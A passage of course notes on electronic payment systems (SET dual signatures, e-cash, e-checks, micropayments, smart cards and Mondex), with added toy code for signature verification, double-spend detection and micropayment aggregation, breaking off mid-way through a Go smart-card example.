where key_public_sign(cardholder) is the public signature key of the cardholder.

Step 3: Finally, he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign(cardholder) ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS.

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party. If either the OI or PI is changed, the dual signature will no longer be valid.
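The dual signature described above, generated by the cardholder and then checked from the merchant's side (OI, H[PI], DS) and from the payment gateway's side (PI, H[OI], DS), as an added example that is not code from the original notes. SHA-256 plays H[], an unpadded textbook RSA key pair generated inside the block stands in for the cardholder's signature key, and the function names (dual_signature, merchant_verify, gateway_verify, demo) are assumptions of this example.

```python
"""Toy SET dual signature (added example, not from the notes).

H[] is SHA-256; the cardholder's signature key is unpadded textbook RSA
generated below. Neither matches SET's real encoding; the structure does.
"""
import hashlib
import random


def H(data: bytes) -> bytes:
    """Message digest H[...] used throughout the dual signature."""
    return hashlib.sha256(data).digest()

def is_probable_prime(n: int, rounds: int = 24) -> bool:
    """Miller-Rabin test, sufficient for a demonstration key pair."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def random_prime(bits: int) -> int:
    """Random odd prime with the top bit set, by rejection sampling."""
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand

def rsa_keygen(bits: int = 1024):
    """Return ((e, n), (d, n)); n must exceed 2**256 so a digest fits."""
    e = 65537
    while True:
        p, q = random_prime(bits // 2), random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            break
    return (e, p * q), (pow(e, -1, phi), p * q)

def rsa_sign(private, digest: bytes) -> int:
    """Textbook RSA signature on the digest integer (toy: no padding)."""
    d, n = private
    return pow(int.from_bytes(digest, "big"), d, n)

def rsa_recover(public, signature: int) -> int:
    """D_RSA[DS | key_public_sign]: undo the signature with the public key."""
    e, n = public
    return pow(signature, e, n)

def dual_signature(private, pi: bytes, oi: bytes) -> int:
    """DS = Sign( H[ H[PI] || H[OI] ] ) under the cardholder's private key."""
    return rsa_sign(private, H(H(pi) + H(oi)))

def merchant_verify(public, oi: bytes, h_pi: bytes, ds: int) -> bool:
    """Merchant holds OI, H[PI], DS: recompute (Step 1), recover (2), compare (3)."""
    expected = int.from_bytes(H(h_pi + H(oi)), "big")
    return rsa_recover(public, ds) == expected

def gateway_verify(public, pi: bytes, h_oi: bytes, ds: int) -> bool:
    """Payment gateway holds PI, H[OI], DS: the same check from the other side."""
    expected = int.from_bytes(H(H(pi) + h_oi), "big")
    return rsa_recover(public, ds) == expected

def demo(bits: int = 1024) -> dict:
    """One purchase through both verifiers, then tampering with OI, PI and DS."""
    public, private = rsa_keygen(bits)
    # Constructed sample order and payment instruction (not real card data).
    oi = b"order=42;item=book;price=10.00;merchant=M1"
    pi = b"card=4000000000000002;exp=12/29;amount=10.00"
    ds = dual_signature(private, pi, oi)
    return {
        "merchant_ok": merchant_verify(public, oi, H(pi), ds),
        "gateway_ok": gateway_verify(public, pi, H(oi), ds),
        # A modified order no longer links to the PI the gateway will see.
        "merchant_tampered_oi": merchant_verify(public, oi + b";price=1.00", H(pi), ds),
        # A modified payment instruction fails at the gateway.
        "gateway_tampered_pi": gateway_verify(public, pi + b"0", H(oi), ds),
        # A signature altered in transit fails for everyone.
        "merchant_bad_ds": merchant_verify(public, oi, H(pi), ds ^ 1),
    }
```

Note that the merchant never receives PI and the gateway never receives OI; each side needs only the other half's hash to rebuild H[H[PI] || H[OI]].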

DIGITAL ENVELOPE -

SET PROTOCOL -

The SET protocol has four phases: initiation, purchase, authorization and capture.

• First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.
• In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.
• In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.
• Finally, the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card. The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

• Issuers
• Customers
• Merchants or traders
• Regulators

Issuers can be banks or non-bank institutions.


Customers are referred to as users who spend E-Cash. Merchants and traders are vendors who receive E-Cash. Regulators are defined as related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

• Account Setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts from various E-Cash issuers. Issuers typically handle accounting for customers and merchants.
• Purchase: Customers purchase certain goods or services and give the merchants tokens which represent equivalent E-Cash. Purchase information is usually encrypted when transmitted over the networks.
• Authentication: Merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system -

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works.


This is a simple model of the E-cash payment system. This gives us the idea of how the e-cash payment system works. The model is explained in the following paragraphs.

The customer approaches his issuer's (bank's) site for accessing his account. The issuer in return issues the money in the form of tokens, which are generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer will endorse those tokens to the merchant for acquiring services, for which the customer will authenticate the payment for the trader.


In the third phase, the trader will approach the token issuer (customer's bank) and, after authenticating the tokens, the issuing bank will convert the tokens into electronic funds and the same will be transferred into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

• E-cash is a system that allows a person to pay for goods or services by transmitting a number from one computer to another.
• Like the serial numbers on real currency notes, the E-cash numbers are unique.
• This is issued by a bank and represents a specified sum of real money.


• It is anonymous and reusable.

Electronic Cash Security

• Complex cryptographic algorithms prevent double spending.
• Anonymity is preserved unless double spending is attempted.
• Serial numbers can allow tracing to prevent money laundering.
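The three-phase token model above (issuer mints tokens in tens and hundreds, customer hands them to the trader, trader redeems them at the issuer) together with the double-spend check from the security list, as an added example that is not from the original notes. The Issuer class, its HMAC-tagged tokens and the demo function are assumptions of this toy: a real e-cash scheme authenticates tokens with the issuer's signature and uses blinding for anonymity, neither of which is modelled here.

```python
"""Toy e-cash issuer: mint, redeem, and detect double spending (added example).

Assumption: the issuer authenticates its own tokens with an HMAC under an
issuer-held secret and keeps a ledger of spent serial numbers. This stands in
for the issuer signature of a real scheme and does not model anonymity.
"""
import hashlib
import hmac
import secrets


class Issuer:
    """Bank-side component: opens accounts, mints tokens, redeems tokens."""

    DENOMINATIONS = (10, 100)  # tokens come "in tens and hundreds"

    def __init__(self):
        self._key = secrets.token_bytes(32)  # issuer secret, never leaves the bank
        self.balances = {}                   # account name -> balance
        self._spent = {}                     # serial -> (merchant, value)

    def _tag(self, serial: str, value: int) -> str:
        """Authentication tag binding a serial number to its face value."""
        msg = f"{serial}:{value}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def open_account(self, name: str, balance: int) -> None:
        self.balances[name] = balance

    def withdraw(self, customer: str, amount: int) -> list:
        """Phase 1: convert account money into tokens with unique serials."""
        if amount % 10 or amount > self.balances.get(customer, 0):
            raise ValueError("amount must be a multiple of 10 within balance")
        self.balances[customer] -= amount
        tokens, remaining = [], amount
        for value in sorted(self.DENOMINATIONS, reverse=True):
            while remaining >= value:
                serial = secrets.token_hex(16)  # unique, like a note's serial
                tokens.append({"serial": serial, "value": value,
                               "tag": self._tag(serial, value)})
                remaining -= value
        return tokens

    def redeem(self, merchant: str, token: dict) -> str:
        """Phase 3: merchant deposits a token; issuer authenticates and credits.

        Returns "ok", "forged" (bad tag) or "double-spend ..." (serial reused).
        """
        serial, value = token["serial"], token["value"]
        if not hmac.compare_digest(token["tag"], self._tag(serial, value)):
            return "forged"
        if serial in self._spent:
            first_merchant, _ = self._spent[serial]
            # The serial number makes the second deposit traceable to the first.
            return f"double-spend (already deposited by {first_merchant})"
        self._spent[serial] = (merchant, value)
        self.balances[merchant] = self.balances.get(merchant, 0) + value
        return "ok"


def demo() -> dict:
    """Constructed scenario: a normal purchase, a replayed token, a forged one."""
    bank = Issuer()
    bank.open_account("alice", 500)
    bank.open_account("shopA", 0)
    bank.open_account("shopB", 0)
    tokens = bank.withdraw("alice", 230)  # 2 x 100 + 3 x 10
    # Phase 2: alice hands every token to shopA, which deposits them.
    first_round = [bank.redeem("shopA", t) for t in tokens]
    # alice tries to spend the first token again at shopB.
    replay = bank.redeem("shopB", tokens[0])
    # Someone rewrites a token's value without knowing the issuer key.
    forged = dict(tokens[1], value=1000)
    return {
        "token_count": len(tokens),
        "first_round": first_round,
        "replay": replay,
        "forged": bank.redeem("shopB", forged),
        "balances": dict(bank.balances),
    }
```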

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password or anything similar is involved. It is simply the online fund transfer from the customer's account to the trader's account.


However, while accessing the customer's account, the customer must keep in mind internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on safe "HTTPS" protocols, and using proper internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

• We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.
• Electronic cash protects its user against theft. With electronic cash, the customer does not need to provide financial information.
• E-cash supports small payments. Other online payment systems charge a fee for every transaction no matter how high or low it is, but e-cash has a specific limit for additional charges; that is why very low payments are not charged a fee.

Limitations

• However secure the e-cash payment system is, still no one is safe against online frauds. In this case the trader is referred to as fraudulent: the trader may take the amount but not provide the services.
• While making the payment, it is very important that the internet connection and power supply remain active. If the payment is in process and the internet supply fails in between, it can lead to loss of information, i.e. the amount will be charged but will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.
• E-Cash is not for everyone. Low income segments without computer and internet access are unable to enjoy the usage of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low income group readiness and technology reliability issues will make E-Cash more perfect. Countries such as India, where people were hesitant to use such methods, have shown tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud

Protecting your businessmdashand your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the echeck, and the public key is the key given to anyone who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.

4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards, including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service.

1. Payer (customer/bill payer) is prompted to authorize the electronic debit and enter the bank routing number (ABA) and account number.

2. Merchant's sales system securely transfers order information to CyberSource over the Internet.

3. CyberSource forwards the bank routing number and account number to the processor.

4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.

5. CyberSource returns the approval/decline message to the merchant.

6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.
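As an added worked example (not CyberSource's, nor code from these notes), the Go program below ties the authentication and duplicate-detection controls from "Protecting your business" to the validation step of the flow above: the payer signs the debit authorization with an Ed25519 private key, and a stand-in processor verifies the signature with the public key, checks the ABA routing number checksum, consults a negative account database and declines a check presented a second time. The ECheck layout, the routing and account numbers and the negative-database entry are all constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// ECheck is the debit authorization the payer signs (constructed layout, not any processor's format).
type ECheck struct {
	Routing string // 9-digit ABA routing number
	Account string // account number at that bank
	Cents   int64  // amount in cents
	Serial  int    // check serial number
	Payee   string
}

// canonical returns the exact bytes that are signed; variable-length fields are
// length-prefixed so any change to a field changes the signed message.
func (c ECheck) canonical() []byte {
	return []byte(fmt.Sprintf("%d:%s|%d:%s|%d|%d|%d:%s",
		len(c.Routing), c.Routing, len(c.Account), c.Account,
		c.Cents, c.Serial, len(c.Payee), c.Payee))
}

// Sign creates the digital signature on the echeck with the payer's private key.
func Sign(priv ed25519.PrivateKey, c ECheck) []byte {
	return ed25519.Sign(priv, c.canonical())
}

// Verify: anyone holding the public key can confirm the payer signed these exact fields.
func Verify(pub ed25519.PublicKey, c ECheck, sig []byte) bool {
	return ed25519.Verify(pub, c.canonical(), sig)
}

// ValidRouting applies the ABA routing number checksum:
// 3*(d1+d4+d7) + 7*(d2+d5+d8) + (d3+d6+d9) must be a multiple of 10.
func ValidRouting(r string) bool {
	if len(r) != 9 {
		return false
	}
	weights := [9]int{3, 7, 1, 3, 7, 1, 3, 7, 1}
	sum := 0
	for i := 0; i < 9; i++ {
		if r[i] < '0' || r[i] > '9' {
			return false
		}
		sum += weights[i] * int(r[i]-'0')
	}
	return sum%10 == 0
}

// Processor stands in for step 4 of the flow: it validates the routing number,
// consults a negative account database and refuses a check presented twice.
type Processor struct {
	negative map[string]bool // "routing/account" keys with a fraud record (constructed)
	seen     map[string]bool // digests of checks already approved
}

func NewProcessor(negative ...string) *Processor {
	p := &Processor{negative: map[string]bool{}, seen: map[string]bool{}}
	for _, acct := range negative {
		p.negative[acct] = true
	}
	return p
}

// Decide returns "approved" or "declined: <reason>". The signature is checked
// first so a tampered check never reaches the later lookups, and the check is
// recorded as seen only once it is approved.
func (p *Processor) Decide(pub ed25519.PublicKey, c ECheck, sig []byte) string {
	switch {
	case !Verify(pub, c, sig):
		return "declined: bad signature or altered fields"
	case !ValidRouting(c.Routing):
		return "declined: invalid routing number"
	case c.Cents <= 0:
		return "declined: non-positive amount"
	case p.negative[c.Routing+"/"+c.Account]:
		return "declined: account on negative database"
	}
	digest := sha256.Sum256(c.canonical())
	key := string(digest[:])
	if p.seen[key] {
		return "declined: duplicate presentment"
	}
	p.seen[key] = true
	return "approved"
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	chk := ECheck{Routing: "123456780", Account: "000123456789", Cents: 4250, Serial: 1041, Payee: "Example Utility"}
	proc := NewProcessor("123456780/999999999") // constructed negative-database entry
	sig := Sign(priv, chk)
	fmt.Println(proc.Decide(pub, chk, sig)) // approved
	fmt.Println(proc.Decide(pub, chk, sig)) // declined: duplicate presentment
}
```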

Four Different Scenarios of the FSTC E-check System


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as a micropayment method, is emerging to cater for very low value transactions. Examples: Millicent (pre-payment/credit based), PayWord (post-payment).


MICRO PAYMENT IS

- Very small payments made over the Web
- Transactions too small for credit cards
- Can be as little as a fraction of a cent
- Alternative to subscription and advertising
- Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.
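To make the aggregation concrete, here is an added example (not from the original notes) of the third-party provider's side of the wallet scheme described earlier and of the summarised bill described under "Advantages and risks": a broker holds prepaid wallet accounts, records each per-fee payment, collects a seller's accruals into one larger payment once they pass a threshold, and summarises a user's period into a single statement. The Broker type, the threshold, the mil unit and the sample users are assumptions of this example.

```go
package main

import (
	"errors"
	"fmt"
	"sort"
)

// Broker is the third-party service provider of the scheme: it holds the
// users' Internet wallet accounts, records each per-fee link that is paid and
// collects the accumulated micropayments into single larger payments.
// Amounts are in mils (thousandths of a cent) so sub-cent prices stay exact.
type Broker struct {
	wallets   map[string]int64            // user -> prepaid wallet balance
	accrued   map[string]int64            // seller -> micropayments not yet collected
	period    map[string]map[string]int64 // user -> seller -> total this billing period
	threshold int64                       // collect a seller once this much has accrued
}

var ErrInsufficient = errors.New("wallet balance too low")

func NewBroker(thresholdMils int64) *Broker {
	return &Broker{
		wallets:   map[string]int64{},
		accrued:   map[string]int64{},
		period:    map[string]map[string]int64{},
		threshold: thresholdMils,
	}
}

// Fund adds prepaid value to a user's wallet.
func (b *Broker) Fund(user string, mils int64) { b.wallets[user] += mils }

// Balance reports what is left in a user's wallet.
func (b *Broker) Balance(user string) int64 { return b.wallets[user] }

// Pay settles one per-fee link. The wallet is debited before the seller is
// credited, so the broker never owes a seller value it does not hold. A
// payment in the other direction is the same call with the roles swapped.
func (b *Broker) Pay(user, seller string, mils int64) error {
	if mils <= 0 {
		return errors.New("amount must be positive")
	}
	if b.wallets[user] < mils {
		return ErrInsufficient
	}
	b.wallets[user] -= mils
	b.accrued[seller] += mils
	if b.period[user] == nil {
		b.period[user] = map[string]int64{}
	}
	b.period[user][seller] += mils
	return nil
}

// Collect turns every accrual that reached the threshold into one larger
// payment and returns those payouts; smaller accruals keep accumulating.
func (b *Broker) Collect() map[string]int64 {
	payouts := map[string]int64{}
	for seller, amt := range b.accrued {
		if amt >= b.threshold {
			payouts[seller] = amt
			delete(b.accrued, seller)
		}
	}
	return payouts
}

// Statement is the single bill for the period: one line per seller, sorted,
// with the many small transactions already summed.
func (b *Broker) Statement(user string) []string {
	sellers := make([]string, 0, len(b.period[user]))
	for s := range b.period[user] {
		sellers = append(sellers, s)
	}
	sort.Strings(sellers)
	lines := make([]string, 0, len(sellers))
	for _, s := range sellers {
		lines = append(lines, fmt.Sprintf("%s: %d mils", s, b.period[user][s]))
	}
	return lines
}

func main() {
	// Constructed walk-through: three 0.25-cent articles and one 1.5-cent track.
	b := NewBroker(1000) // collect a seller once a full cent has accrued
	b.Fund("alice", 5000)
	for i := 0; i < 3; i++ {
		_ = b.Pay("alice", "news", 250)
	}
	_ = b.Pay("alice", "music", 1500)
	fmt.Println(b.Collect())          // map[music:1500]; news (750) keeps accruing
	fmt.Println(b.Statement("alice")) // [music: 1500 mils news: 750 mils]
}
```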

Payment options

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for desired content or goods.

The most common micropayment options are listed below.

- Call2pay: payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.
- Handypay: payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.
- Ebank2pay: payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.
- Credit card: payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure method (Verified by VISA and MasterCard SecureCode).
- Direct debit: payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses

- Publishing
- Marketing
- Software
- Entertainment
- Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card

- Standard credit card-sized, with a microchip embedded on it
- Two types:
  o Memory-only chips
  o Microprocessor chips
- Can hold up to 32,000 bytes
- Newer smart cards have math co-processors
  o Perform complex encryption routines quickly
- In 1968 German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards


Why Smart Cards

- Improve the convenience and security of any transaction
- Provide tamper-proof storage of user and account identity
- Provide vital components of system security
- Protect against a full range of security threats

Advantages

- Flexibility
- Security
- Portability
- Increasing data storage capacity
- Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications

- Ticketless travel
  o Seoul bus system: 4M cards, 1B transactions since 1996
  o Planned: the SF Bay Area system
- Authentication, ID
- Medical records
- Ecash
- Store loyalty programs
- Personal profiles
- Government
  o Licenses
- Mall parking

Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

- Direct transfer of electronic money between two cards
- Transfer of electronic money over the Internet or telephone networks, etc.
- Keep transaction records
- Password protection and "lock card" functions
- Portable balance finder to check balance
- Support multiple currencies


ADVANTAGES

CONSUMER

- Convenience
- Accessibility
- On chip record of recent transactions
- Home load
- Internet purchases

MERCHANT

- Reliable off-line payment
- Higher security
- Low transaction cost
- Reduced cash handling

FINANCIAL INSTITUTION

- Strengthen customer relationships
- New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy

Principles protected:

  o Limits for collecting personal information
  o Limits for using, disclosing and keeping personal information
  o Keeping personal information accurate
  o Safeguarding personal information

Limits for collecting personal information

  o loads from account
  o deposits into account
  o lost transactions

Limits for using, disclosing and keeping personal information

  o safeguard deposits
  o to reimburse for non-performance

Keeping personal information accurate

  o load and unload are online
  o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

  o firewalls in Multos, between applications (ITSEC 6 designation)
  o transaction data to retailer is deliberately limited
  o individual transaction data is not collected by banks; Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card, you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.
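The overflow the critics describe can be seen in a small model. The added Go example below is not Mondex's design or code: the ring size of 10 comes from the "rolling 10 transactions" note earlier in this section, and everything else (the Card and Entry types, the balances and the two sample cards) is constructed. It performs offline card-to-card transfers with a fixed-size on-card log and then shows that once more transfers happen between two uploads than the log can hold, the bank can no longer reconcile the surviving records with the balance change.

```go
package main

import (
	"errors"
	"fmt"
)

// logSize is the rolling record of recent transactions the chip keeps.
const logSize = 10

// Entry is one record on the card: the counterparty and the signed amount
// (negative when the card paid, positive when it received value).
type Entry struct {
	Counterparty string
	Delta        int64
}

// Card models the purse: a unique id, the stored value and a fixed-size ring
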